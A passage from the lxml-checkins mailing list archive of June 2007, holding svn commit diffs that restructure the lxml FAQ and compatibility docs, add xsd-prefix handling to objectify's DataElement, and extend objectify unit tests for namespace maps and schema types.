lxml`: http://cheeseshop.python.org/pypi/lxml -.. _easy_install: http://peak.telecommunity.com/DevCenter/EasyInstall -This has been reported to work on Linux, MacOS-X 10.4 and Windows, as long as -libxml2 and libxslt are properly installed. To compile and install lxml -without easy_install, please read `how to build lxml from source`_ (or the -file ``build.txt`` in the ``doc`` directory of the source tree). +MacOS-X +------- + +On MacOS-X 10.4, you can try to use the installed system libraries when you +build lxml yourself. However, the library versions on this system are older +than the required versions, so you may encounter certain differences in +behaviour or even crashes. A number of users reported success with updated +libraries (e.g. using fink_), but needed to set the environment variable +``DYLD_LIBRARY_PATH`` to the directory where fink keeps the libraries. + +.. _fink: http://finkproject.org/ Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Mon Jun 18 13:39:01 2007 @@ -90,7 +90,7 @@ strictly compliant way. As of release 2.4.16, libxml2 passed all 1800+ tests from the OASIS XML Tests Suite. -lxml currently supports libxml2 2.6.16 or later, which has even better support +lxml currently supports libxml2 2.6.20 or later, which has even better support for various XML standards. Some of the more important ones are: HTML, XML namespaces, XPath, XInclude, XSLT, XML catalogs, canonical XML, RelaxNG, XML:ID. Support for XML Schema and Schematron is currently incomplete in @@ -104,22 +104,23 @@ It really depends on your application, but the rule of thumb is: more recent versions contain less bugs and provide more features. -* Try to use versions of both libraries that were released together. +* Try to use versions of both libraries that were released together. At least + the libxml2 version should not be older than the libxslt version. * If you use XML Schema or Schematron which are still under development, the -most recent version of libxml2 is usually a good bet. + most recent version of libxml2 is usually a good bet. * The same applies to XPath, where a substantial number of bugs and memory -leaks were fixed over time. If you encounter crashes or memory leaks in XPath -applications, try a more recent version of libxml2. + leaks were fixed over time. If you encounter crashes or memory leaks in + XPath applications, try a more recent version of libxml2. * For parsing and fixing broken HTML, lxml requires at least libxml2 2.6.21. * For the normal tree handling, however, any libxml2 version starting with -2.6.16 should do. + 2.6.20 should do. Read the `release notes of libxml2`_ and the `release notes of libxslt`_ to -see if a specific bug has been fixed. +see when (or if) a specific bug has been fixed. .. _`release notes of libxml2`: http://xmlsoft.org/news.html .. _`release notes of libxslt`: http://xmlsoft.org/XSLT/news.html Modified: lxml/trunk/doc/compatibility.txt ============================================================================== --- lxml/trunk/doc/compatibility.txt (original) +++ lxml/trunk/doc/compatibility.txt Mon Jun 18 13:39:01 2007 @@ -1,3 +1,4 @@ +============================= lxml.etree versus ElementTree ============================= @@ -25,12 +26,8 @@ # use from lxml import etree as ElementTree -* Some minor parts of the API of ElementTree have not yet been implemented and - are thus missing in lxml.etree. Feel free to help out! - -* Then again, lxml.etree offers a lot more functionality, such as - XPath, XSLT, Relax NG, and XML Schema support, which (c)ElementTree - does not offer. +* lxml.etree offers a lot more functionality, such as XPath, XSLT, Relax NG, + and XML Schema support, which (c)ElementTree does not offer. * etree has a different idea about Python unicode strings than ElementTree. In most parts of the API, ElementTree uses plain strings and unicode strings @@ -77,32 +74,40 @@ - Unfortunately this is a rather fundamental difference in behavior, which - will be hard to solve. It won't affect some applications, but if you want - to port code you must unfortunately make sure that it doesn't. + Unfortunately this is a rather fundamental difference in behavior, which is + hard to change. It won't affect some applications, but if you want to port + code you must unfortunately make sure that it doesn't affect yours. + +* etree allows navigation to the parent of a node by the ``getparent()`` + method and to the siblings by calling ``getnext()`` and ``getprevious()``. + This is not possible in ElementTree as the underlying tree model does not + have this information. * When trying to set a subelement using __setitem__ that is in fact not an Element but some other object, etree raises a TypeError, and ElementTree raises an AssertionError. This also applies to some other places of the - API. In general, etree tries to avoid AssertionErrors in favour of being + API. In general, etree tries to avoid AssertionErrors in favour of being more specific about the reason for the exception. -* When parsing fails in ``iterparse()``, ElementTree raises an ExpatError - instead of a SyntaxError. lxml.etree follows the other parts of the parser - API and raises an (XML)SyntaxError. +* When parsing fails in ``iterparse()``, ElementTree raises a low-level + ExpatError instead of a SyntaxError as the other parsers. lxml.etree + follows the other parts of the parser API and raises an (XML)SyntaxError. * The ``iterparse()`` function in lxml is implemented based on the libxml2 - parser. This means that modifications of the document root or the ancestors - of the current element during parsing can irritate the parser and even - segfault. While this is not a problem in the Python object structure used - by ElementTree, the C tree underlying lxml suffers from it. The golden rule - for ``iterparse()`` on lxml therefore is: do not touch anything that will - have to be touched again by the parser later on. See the lxml API - documentation on this. + parser and tree generator. This means that modifications of the document + root or the ancestors of the current element during parsing can irritate the + parser and even segfault. While this is not a problem in the Python object + structure used by ElementTree, the C tree underlying lxml suffers from it. + The golden rule for ``iterparse()`` on lxml therefore is: do not touch + anything that will have to be touched again by the parser later on. See the + lxml parser documentation on this. * ElementTree ignores comments and processing instructions when parsing XML, while etree will read them in and treat them as Comment or - ProcessingInstruction elements respectively. + ProcessingInstruction elements respectively. This is especially visible + where comments are found inside text content, which is then split by the + Comment element. You can disable this behaviour by passing the boolean + ``remove_comments`` keyword argument to the parser you use. * ElementTree has a bug when serializing an empty Comment (no text argument given) to XML, etree serializes this successfully. @@ -113,18 +118,19 @@ * ElementTree merges the target of a processing instruction into ``PI.text``, while lxml.etree puts it into the ``.target`` property and leaves it out of - the ``.text`` property. + the ``.text`` property. The ``pi.text`` in ElementTree therefore + correspondents to ``pi.target + " " + pi.text`` in lxml.etree. * Because etree is built on top of libxml2, which is namespace prefix aware, etree preserves namespaces declarations and prefixes while ElementTree tends to come up with its own prefixes (ns0, ns1, etc). When no namespace prefix - is given however, etree creates ElementTree style prefixes as well. + is given, however, etree creates ElementTree style prefixes as well. * etree has a 'prefix' attribute (read-only) on elements giving the Element's prefix, if this is known, and None otherwise (in case of no namespace at all, or default namespace). - etree further allows passing an 'nsmap' dictionary to the Element and +* etree further allows passing an 'nsmap' dictionary to the Element and SubElement element factories to explicitly map namespace prefixes to namespace URIs. These will be translated into namespace declarations on that element. This means that in the probably rare case that you need to @@ -132,13 +138,9 @@ ElementTree, you cannot pass it as a keyword argument to the Element and SubElement factories directly. -* etree elements can be copied using copy.deepcopy() and copy.copy(), just - like ElementTree's. copy.copy() however does *not* create a shallow copy - where elements are shared between trees, as this makes no sense in the - context of libxml2 trees. Note that lxml can deep-copy trees considerably - faster than ElementTree. - -* etree allows navigation to the parent of a node by the ``getparent()`` - method and to the siblings by calling ``getnext()`` and ``getprevious()``. - This is not possible in ElementTree as the underlying tree model does not - have this information. +* etree elements can be copied using ``copy.deepcopy()`` and ``copy.copy()``, + just like ElementTree's. However, ``copy.copy()`` does *not* create a + shallow copy where elements are shared between trees, as this makes no sense + in the context of libxml2 trees. Note that lxml can deep-copy trees + considerably faster than ElementTree, so a deep copy might still be fast + enough to replace a shallow copy in your case. From scoder at codespeak.net Tue Jun 19 10:39:34 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 10:39:34 +0200 (CEST) Subject: [Lxml-checkins] r44360 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070619083934.5C44980DB@code0.codespeak.net> Author: scoder Date: Tue Jun 19 10:39:33 2007 New Revision: 44360 Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx Log: allow xsd prefixes in DataElement _xsd argument Modified: lxml/branch/lxml-1.3/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/objectify.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/objectify.pyx Tue Jun 19 10:39:33 2007 @@ -1664,6 +1664,7 @@ if the type can be identified. If '_pytype' or '_xsi' are among the keyword arguments, they will be used instead. """ + cdef python.PyObject* dict_result if nsmap is None: nsmap = _DEFAULT_NSMAP if attrib is not None: @@ -1671,12 +1672,19 @@ attrib.update(_attributes) _attributes = attrib if _xsi is not None: + if ':' in _xsi: + prefix, name = _xsi.split(':', 1) + ns = nsmap.get(prefix) + if ns != XML_SCHEMA_NS: + raise ValueError, "XSD types require the XSD namespace" python.PyDict_SetItem(_attributes, XML_SCHEMA_INSTANCE_TYPE_ATTR, _xsi) if _pytype is None: - # allow for s.o. using unregistered or even wrong xsi:type names - pytype_lookup = _SCHEMA_TYPE_DICT.get(_xsi) - if pytype_lookup is not None: - _pytype = pytype_lookup.name + # allow using unregistered or even wrong xsi:type names + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, _xsi) + if dict_result is NULL: + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, name) + if dict_result is not NULL: + _pytype = (dict_result).name if python._isString(_value): strval = _value From scoder at codespeak.net Tue Jun 19 10:54:44 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 10:54:44 +0200 (CEST) Subject: [Lxml-checkins] r44362 - lxml/branch/lxml-1.3/src/lxml/tests Message-ID: <20070619085444.E34F580EA@code0.codespeak.net> Author: scoder Date: Tue Jun 19 10:54:44 2007 New Revision: 44362 Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Log: objectify testcases by Holger Modified: lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py Tue Jun 19 10:54:44 2007 @@ -13,10 +13,14 @@ from lxml import objectify +PYTYPE_NAMESPACE = "http://codespeak.net/lxml/objectify/pytype" XML_SCHEMA_NS = "http://www.w3.org/2001/XMLSchema" XML_SCHEMA_INSTANCE_NS = "http://www.w3.org/2001/XMLSchema-instance" XML_SCHEMA_INSTANCE_TYPE_ATTR = "{%s}type" % XML_SCHEMA_INSTANCE_NS XML_SCHEMA_NIL_ATTR = "{%s}nil" % XML_SCHEMA_INSTANCE_NS +DEFAULT_NSMAP = { "py" : PYTYPE_NAMESPACE, + "xsi" : XML_SCHEMA_INSTANCE_NS, + "xsd" : XML_SCHEMA_NS} xml_str = '''\ @@ -52,6 +56,116 @@ self.etree.Namespace("otherNS").clear() objectify.setPytypeAttributeTag() + def test_element_nsmap(self): + # default nsmap + root = objectify.Element("test") + self.assertEquals(root.nsmap, DEFAULT_NSMAP) + + # empty nsmap + nsmap = {} + root = objectify.Element("test", nsmap=nsmap) + self.assertEquals(root.nsmap.values(), [PYTYPE_NAMESPACE]) + + # nsmap with custom prefixes + nsmap = {"mypy" : PYTYPE_NAMESPACE, + "myxsi" : XML_SCHEMA_INSTANCE_NS, + "myxsd" : XML_SCHEMA_NS} + root = objectify.Element("test", nsmap=nsmap) + self.assertEquals(root.nsmap, nsmap) + + # custom nsmap + nsmap = {"my" : "someNS", + "myother" : "someOtherNS", + } + root = objectify.Element("test", nsmap=nsmap) + self.assert_(PYTYPE_NAMESPACE in root.nsmap.values()) + for prefix, ns in nsmap.items(): + self.assert_(prefix in root.nsmap) + self.assertEquals(nsmap[prefix], root.nsmap[prefix]) + + def test_sub_element_nsmap(self): + root = objectify.Element("root") + # default nsmap + root.sub = objectify.Element("test") + self.assertEquals(root.sub.nsmap, DEFAULT_NSMAP) + + # empty nsmap + nsmap = {} + root.sub = objectify.Element("test", nsmap=nsmap) + self.assertEquals(root.sub.nsmap, DEFAULT_NSMAP) + + # nsmap with custom prefixes + nsmap = {"mypy" : PYTYPE_NAMESPACE, + "myxsi" : XML_SCHEMA_INSTANCE_NS, + "myxsd" : XML_SCHEMA_NS} + root.sub = objectify.Element("test", nsmap=nsmap) + self.assertEquals(root.sub.nsmap, DEFAULT_NSMAP) + + # custom nsmap + nsmap = {"my" : "someNS", + "myother" : "someOtherNS", + } + root.sub = objectify.Element("test", nsmap=nsmap) + expected = nsmap.copy() + expected.update(DEFAULT_NSMAP) + self.assertEquals(root.sub.nsmap, expected) + + def test_data_element_nsmap(self): + # default nsmap + value = objectify.DataElement("test this") + self.assertEquals(value.nsmap, DEFAULT_NSMAP) + + # empty nsmap + nsmap = {} + value = objectify.DataElement("test this", nsmap=nsmap) + self.assertEquals(value.nsmap.values(), [PYTYPE_NAMESPACE]) + + # nsmap with custom prefixes + nsmap = {"mypy" : PYTYPE_NAMESPACE, + "myxsi" : XML_SCHEMA_INSTANCE_NS, + "myxsd" : XML_SCHEMA_NS} + + value = objectify.DataElement("test this", nsmap=nsmap) + self.assertEquals(value.nsmap, nsmap) + + # custom nsmap + nsmap = {"my" : "someNS", + "myother" : "someOtherNS", + } + value = objectify.DataElement("test", nsmap=nsmap) + self.assert_(PYTYPE_NAMESPACE in value.nsmap.values()) + for prefix, ns in nsmap.items(): + self.assert_(prefix in value.nsmap) + self.assertEquals(nsmap[prefix], value.nsmap[prefix]) + + def test_sub_data_element_nsmap(self): + root = objectify.Element("root") + # default nsmap + root.value = objectify.DataElement("test this") + self.assertEquals(root.value.nsmap, DEFAULT_NSMAP) + + # empty nsmap + nsmap = {} + root.value = objectify.DataElement("test this", nsmap=nsmap) + self.assertEquals(root.value.nsmap, DEFAULT_NSMAP) + + # nsmap with custom prefixes + nsmap = {"mypy" : PYTYPE_NAMESPACE, + "myxsi" : XML_SCHEMA_INSTANCE_NS, + "myxsd" : XML_SCHEMA_NS} + + root.value = objectify.DataElement("test this", nsmap=nsmap) + self.assertEquals(root.value.nsmap, DEFAULT_NSMAP) + + # custom nsmap + nsmap = {"my" : "someNS", + "myother" : "someOtherNS", + } + root.value = objectify.DataElement("test", nsmap=nsmap) + expected = nsmap.copy() + expected.update(DEFAULT_NSMAP) + self.assertEquals(root.value.nsmap, expected) + def test_root(self): root = self.Element("test") self.assert_(isinstance(root, objectify.ObjectifiedElement)) @@ -287,8 +401,13 @@ Element = self.Element SubElement = self.etree.SubElement root = Element("{objectified}root") - root.none = 'true' - self.assert_(isinstance(root.none, objectify.BoolElement)) + root.bool = 'true' + self.assert_(isinstance(root.bool, objectify.BoolElement)) + self.assertEquals(root.bool, True) + + root.bool = 'false' + self.assert_(isinstance(root.bool, objectify.BoolElement)) + self.assertEquals(root.bool, False) def test_data_element_bool(self): value = objectify.DataElement(True) @@ -401,9 +520,9 @@ for b in root.b: self.assert_(isinstance(b, objectify.BoolElement)) - self.assertEquals(True, root.b[0]) + self.assertEquals(True, root.b[0]) self.assertEquals(False, root.b[1]) - self.assertEquals(True, root.b[2]) + self.assertEquals(True, root.b[2]) self.assertEquals(False, root.b[3]) for f in root.f: @@ -416,7 +535,7 @@ for l in root.l: self.assert_(isinstance(l, objectify.LongElement)) - self.assertEquals(5l, l) + self.assertEquals(5L, l) for i in root.i: self.assert_(isinstance(i, objectify.IntElement)) @@ -425,6 +544,75 @@ self.assert_(isinstance(root.n, objectify.NoneElement)) self.assertEquals(None, root.n) + def test_schema_types_prefixed(self): + XML = self.XML + root = XML('''\ + + true + false + 1 + 0 + + 5 + 5 + + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + + 5 + 5 + 5 + 5 + 5 + 5 + 5 + 5 + + 5 + 5 + 5 + 5 + 5 + + + + ''') + + for b in root.b: + self.assert_(isinstance(b, objectify.BoolElement)) + self.assertEquals(True, root.b[0]) + self.assertEquals(False, root.b[1]) + self.assertEquals(True, root.b[2]) + self.assertEquals(False, root.b[3]) + + for f in root.f: + self.assert_(isinstance(f, objectify.FloatElement)) + self.assertEquals(5, f) + + for s in root.s: + self.assert_(isinstance(s, objectify.StringElement)) + self.assertEquals("5", s) + + for l in root.l: + self.assert_(isinstance(l, objectify.LongElement)) + self.assertEquals(5L, l) + + for i in root.i: + self.assert_(isinstance(i, objectify.IntElement)) + self.assertEquals(5, i) + + self.assert_(isinstance(root.n, objectify.NoneElement)) + self.assertEquals(None, root.n) + def test_type_str_sequence(self): XML = self.XML root = XML(u'whytry') @@ -522,19 +710,19 @@ child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) for c in root.iterchildren() ] - self.assertEquals("int", child_types[0]) - self.assertEquals("str", child_types[1]) - self.assertEquals("float", child_types[2]) - self.assertEquals("str", child_types[3]) - self.assertEquals("bool", child_types[4]) - self.assertEquals("none", child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("float", child_types[7]) - self.assertEquals("float", child_types[8]) - self.assertEquals("str", child_types[9]) - self.assertEquals("int", child_types[10]) - self.assertEquals("int", child_types[11]) - self.assertEquals("int", child_types[12]) + self.assertEquals("int", child_types[ 0]) + self.assertEquals("str", child_types[ 1]) + self.assertEquals("float", child_types[ 2]) + self.assertEquals("str", child_types[ 3]) + self.assertEquals("bool", child_types[ 4]) + self.assertEquals("none", child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("float", child_types[ 7]) + self.assertEquals("float", child_types[ 8]) + self.assertEquals("str", child_types[ 9]) + self.assertEquals("int", child_types[10]) + self.assertEquals("int", child_types[11]) + self.assertEquals("int", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -562,19 +750,19 @@ child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) for c in root.iterchildren() ] - self.assertEquals("int", child_types[0]) - self.assertEquals("str", child_types[1]) - self.assertEquals("float", child_types[2]) - self.assertEquals("str", child_types[3]) - self.assertEquals("bool", child_types[4]) - self.assertEquals("none", child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("float", child_types[7]) - self.assertEquals("float", child_types[8]) - self.assertEquals("str", child_types[9]) - self.assertEquals("str", child_types[10]) + self.assertEquals("int", child_types[ 0]) + self.assertEquals("str", child_types[ 1]) + self.assertEquals("float", child_types[ 2]) + self.assertEquals("str", child_types[ 3]) + self.assertEquals("bool", child_types[ 4]) + self.assertEquals("none", child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("float", child_types[ 7]) + self.assertEquals("float", child_types[ 8]) + self.assertEquals("str", child_types[ 9]) + self.assertEquals("str", child_types[10]) self.assertEquals("float", child_types[11]) - self.assertEquals("long", child_types[12]) + self.assertEquals("long", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -610,7 +798,8 @@ XML = self.XML root = XML(u'''\ + xmlns:py="http://codespeak.net/lxml/objectify/pytype" + xmlns:xsd="http://www.w3.org/2001/XMLSchema"> 5 test 1.1 @@ -618,9 +807,9 @@ true - 5 - 5 - 23 + 5 + 5 + 23 42 300 2 @@ -650,6 +839,51 @@ for c in root.getiterator(): self.assertEquals(None, c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR)) + def test_pytype_deannotate(self): + XML = self.XML + root = XML(u'''\ + + 5 + test + 1.1 + \uF8D2 + true + + + 5 + 5 + 23 + 42 + 300 + 2 + + ''') + objectify.annotate(root) + objectify.deannotate(root, xsi=False) + + child_types = [ c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR) + for c in root.iterchildren() ] + self.assertEquals("xsd:int", child_types[ 0]) + self.assertEquals("xsd:string", child_types[ 1]) + self.assertEquals("xsd:float", child_types[ 2]) + self.assertEquals("xsd:string", child_types[ 3]) + self.assertEquals("xsd:boolean", child_types[ 4]) + self.assertEquals(None, child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("xsd:double", child_types[ 7]) + self.assertEquals("xsd:float", child_types[ 8]) + self.assertEquals("xsd:string", child_types[ 9]) + self.assertEquals("xsd:string", child_types[10]) + self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:long", child_types[12]) + + self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + + for c in root.getiterator(): + self.assertEquals(None, c.get(objectify.PYTYPE_ATTRIBUTE)) + def test_change_pytype_attribute(self): XML = self.XML From scoder at codespeak.net Tue Jun 19 13:50:40 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 13:50:40 +0200 (CEST) Subject: [Lxml-checkins] r44365 - lxml/trunk/doc Message-ID: <20070619115040.54E3C80E5@code0.codespeak.net> Author: scoder Date: Tue Jun 19 13:50:39 2007 New Revision: 44365 Modified: lxml/trunk/doc/FAQ.txt Log: FAQ restructuring Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Tue Jun 19 13:50:39 2007 @@ -18,31 +18,32 @@ 1.1 Is there a tutorial? 1.2 Where can I find more documentation about lxml? 1.3 What standards does lxml implement? - 1.4 Which version of libxml2 and libxslt should I use or require? - 1.5 Where are the Windows binaries? - 1.6 What is the difference between lxml.etree and lxml.objectify? - 1.7 How can I make my application run faster? - 1.8 Why do I get errors about missing UCS4 symbols when installing lxml? - 2 Contributing - 2.1 Why is lxml not written in Python? - 2.2 How can I contribute? - 3 Bugs - 3.1 My application crashes! - 3.2 I think I have found a bug in lxml. What should I do? - 4 Threading - 4.1 Can I use threads to concurrently access the lxml API? - 4.2 Does my program run faster if I use threads? - 4.3 Would my single-threaded program run faster if I turned off threading? - 5 Parsing and Serialisation - 5.1 Why doesn't the ``pretty_print`` option reformat my XML output? - 5.2 Why can't lxml parse my XML from unicode strings? - 5.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? - 5.4 Why can't I just delete parents or clear the root node in iterparse()? - 6 XPath and Document Traversal - 6.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? - 6.2 Why doesn't ``findall()`` support full XPath expressions? - 6.3 How can I find out which namespace prefixes are used in a document? - 6.4 How can I specify a default namespace for XPath expressions? + 1.4 What is the difference between lxml.etree and lxml.objectify? + 1.5 How can I make my application run faster? + 2 Installation + 2.1 Which version of libxml2 and libxslt should I use or require? + 2.2 Where are the Windows binaries? + 2.3 Why do I get errors about missing UCS4 symbols when installing lxml? + 3 Contributing + 3.1 Why is lxml not written in Python? + 3.2 How can I contribute? + 4 Bugs + 4.1 My application crashes! + 4.2 I think I have found a bug in lxml. What should I do? + 5 Threading + 5.1 Can I use threads to concurrently access the lxml API? + 5.2 Does my program run faster if I use threads? + 5.3 Would my single-threaded program run faster if I turned off threading? + 6 Parsing and Serialisation + 6.1 Why doesn't the ``pretty_print`` option reformat my XML output? + 6.2 Why can't lxml parse my XML from unicode strings? + 6.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? + 6.4 Why can't I just delete parents or clear the root node in iterparse()? + 7 XPath and Document Traversal + 7.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? + 7.2 Why doesn't ``findall()`` support full XPath expressions? + 7.3 How can I find out which namespace prefixes are used in a document? + 7.4 How can I specify a default namespace for XPath expressions? General Questions @@ -98,6 +99,51 @@ supports loading documents through HTTP and FTP. +What is the difference between lxml.etree and lxml.objectify? +------------------------------------------------------------- + +The two modules provide different ways of handling XML. However, objectify +builds on top of lxml.etree and therefore inherits most of its capabilities +and a large portion of its API. + +* lxml.etree is a generic API for XML and HTML handling. It aims for + ElementTree compatibility_ and supports the entire XML infoset. It is well + suited for both mixed content and data centric XML. Its generality makes it + the best choice for most applications. + +* lxml.objectify is a specialized API for XML data handling in a Python object + syntax. It provides a very natural way to deal with data fields stored in a + structurally well defined XML format. Data is automatically converted to + Python data types and can be manipulated with normal Python operators. Look + at the examples in the `objectify documentation`_ to see what it feels like + to use it. + + Objectify is not well suited for mixed contents or HTML documents. As it is + built on top of lxml.etree, however, it inherits the normal support for + XPath, XSLT or validation. + + +How can I make my application run faster? +----------------------------------------- + +lxml.etree is a very fast library for processing XML. There are, however, `a +few caveats`_ involved in the mapping of the powerful libxml2 library to the +simple and convenient ElementTree API. Not all operations are as fast as the +simplicity of the API might suggest, while some use cases can heavily benefit +from finding the right way of doing them. The `benchmark page`_ has a +comparison to other ElementTree implementations and a number of tips for +performance tweaking. As with any Python application, the rule of thumb is: +the more of your processing runs in C, the faster your application gets. See +also the section on threading_. + +.. _`a few caveats`: performance.html#the-elementtree-api +.. _`benchmark page`: performance.html +.. _threading: #threading + + +Installation +============ + Which version of libxml2 and libxslt should I use or require? ------------------------------------------------------------- @@ -152,48 +198,6 @@ http://cheeseshop.python.org/pypi/lxml/1.1.2 -What is the difference between lxml.etree and lxml.objectify? -------------------------------------------------------------- - -The two modules provide different ways of handling XML. However, objectify -builds on top of lxml.etree and therefore inherits most of its capabilities -and a large portion of its API. - -* lxml.etree is a generic API for XML and HTML handling. It aims for - ElementTree compatibility_ and supports the entire XML infoset. It is well - suited for both mixed content and data centric XML. Its generality makes it - the best choice for most applications. - -* lxml.objectify is a specialized API for XML data handling in a Python object - syntax. It provides a very natural way to deal with data fields stored in a - structurally well defined XML format. Data is automatically converted to - Python data types and can be manipulated with normal Python operators. Look - at the examples in the `objectify documentation`_ to see what it feels like - to use it. - - Objectify is not well suited for mixed contents or HTML documents. As it is - built on top of lxml.etree, however, it inherits the normal support for - XPath, XSLT or validation. - - -How can I make my application run faster? ------------------------------------------ - -lxml.etree is a very fast library for processing XML. There are, however, `a -few caveats`_ involved in the mapping of the powerful libxml2 library to the -simple and convenient ElementTree API. Not all operations are as fast as the -simplicity of the API might suggest, while some use cases can heavily benefit -from finding the right way of doing them. The `benchmark page`_ has a -comparison to other ElementTree implementations and a number of tips for -performance tweaking. As with any Python application, the rule of thumb is: -the more of your processing runs in C, the faster your application gets. See -also the section on threading_. - -.. _`a few caveats`: performance.html#the-elementtree-api -.. _`benchmark page`: performance.html -.. _threading: #threading - - Why do I get errors about missing UCS4 symbols when installing lxml? -------------------------------------------------------------------- From scoder at codespeak.net Tue Jun 19 13:52:36 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Tue, 19 Jun 2007 13:52:36 +0200 (CEST) Subject: [Lxml-checkins] r44366 - lxml/branch/lxml-1.3/doc Message-ID: <20070619115236.EEC0B80D8@code0.codespeak.net> Author: scoder Date: Tue Jun 19 13:52:35 2007 New Revision: 44366 Modified: lxml/branch/lxml-1.3/doc/FAQ.txt Log: FAQ merge from trunk Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Tue Jun 19 13:52:35 2007 @@ -19,31 +19,32 @@ 1.1 Is there a tutorial? 1.2 Where can I find more documentation about lxml? 1.3 What standards does lxml implement? - 1.4 Which version of libxml2 and libxslt should I use or require? - 1.5 Where are the Windows binaries? - 1.6 What is the difference between lxml.etree and lxml.objectify? - 1.7 How can I make my application run faster? - 1.8 Why do I get errors about missing UCS4 symbols when installing lxml? - 2 Contributing - 2.1 Why is lxml not written in Python? - 2.2 How can I contribute? - 3 Bugs - 3.1 My application crashes! - 3.2 I think I have found a bug in lxml. What should I do? - 4 Threading - 4.1 Can I use threads to concurrently access the lxml API? - 4.2 Does my program run faster if I use threads? - 4.3 Would my single-threaded program run faster if I turned off threading? - 5 Parsing and Serialisation - 5.1 Why doesn't the ``pretty_print`` option reformat my XML output? - 5.2 Why can't lxml parse my XML from unicode strings? - 5.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? - 5.4 Why can't I just delete parents or clear the root node in iterparse()? - 6 XPath and Document Traversal - 6.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? - 6.2 Why doesn't ``findall()`` support full XPath expressions? - 6.3 How can I find out which namespace prefixes are used in a document? - 6.4 How can I specify a default namespace for XPath expressions? + 1.4 What is the difference between lxml.etree and lxml.objectify? + 1.5 How can I make my application run faster? + 2 Installation + 2.1 Which version of libxml2 and libxslt should I use or require? + 2.2 Where are the Windows binaries? + 2.3 Why do I get errors about missing UCS4 symbols when installing lxml? + 3 Contributing + 3.1 Why is lxml not written in Python? + 3.2 How can I contribute? + 4 Bugs + 4.1 My application crashes! + 4.2 I think I have found a bug in lxml. What should I do? + 5 Threading + 5.1 Can I use threads to concurrently access the lxml API? + 5.2 Does my program run faster if I use threads? + 5.3 Would my single-threaded program run faster if I turned off threading? + 6 Parsing and Serialisation + 6.1 Why doesn't the ``pretty_print`` option reformat my XML output? + 6.2 Why can't lxml parse my XML from unicode strings? + 6.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? + 6.4 Why can't I just delete parents or clear the root node in iterparse()? + 7 XPath and Document Traversal + 7.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? + 7.2 Why doesn't ``findall()`` support full XPath expressions? + 7.3 How can I find out which namespace prefixes are used in a document? + 7.4 How can I specify a default namespace for XPath expressions? General Questions @@ -99,6 +100,51 @@ supports loading documents through HTTP and FTP. +What is the difference between lxml.etree and lxml.objectify? +------------------------------------------------------------- + +The two modules provide different ways of handling XML. However, objectify +builds on top of lxml.etree and therefore inherits most of its capabilities +and a large portion of its API. + +* lxml.etree is a generic API for XML and HTML handling. It aims for + ElementTree compatibility_ and supports the entire XML infoset. It is well + suited for both mixed content and data centric XML. Its generality makes it + the best choice for most applications. + +* lxml.objectify is a specialized API for XML data handling in a Python object + syntax. It provides a very natural way to deal with data fields stored in a + structurally well defined XML format. Data is automatically converted to + Python data types and can be manipulated with normal Python operators. Look + at the examples in the `objectify documentation`_ to see what it feels like + to use it. + + Objectify is not well suited for mixed contents or HTML documents. As it is + built on top of lxml.etree, however, it inherits the normal support for + XPath, XSLT or validation. + + +How can I make my application run faster? +----------------------------------------- + +lxml.etree is a very fast library for processing XML. There are, however, `a +few caveats`_ involved in the mapping of the powerful libxml2 library to the +simple and convenient ElementTree API. Not all operations are as fast as the +simplicity of the API might suggest, while some use cases can heavily benefit +from finding the right way of doing them. The `benchmark page`_ has a +comparison to other ElementTree implementations and a number of tips for +performance tweaking. As with any Python application, the rule of thumb is: +the more of your processing runs in C, the faster your application gets. See +also the section on threading_. + +.. _`a few caveats`: performance.html#the-elementtree-api +.. _`benchmark page`: performance.html +.. _threading: #threading + + +Installation +============ + Which version of libxml2 and libxslt should I use or require? ------------------------------------------------------------- @@ -153,48 +199,6 @@ http://cheeseshop.python.org/pypi/lxml/1.1.2 -What is the difference between lxml.etree and lxml.objectify? -------------------------------------------------------------- - -The two modules provide different ways of handling XML. However, objectify -builds on top of lxml.etree and therefore 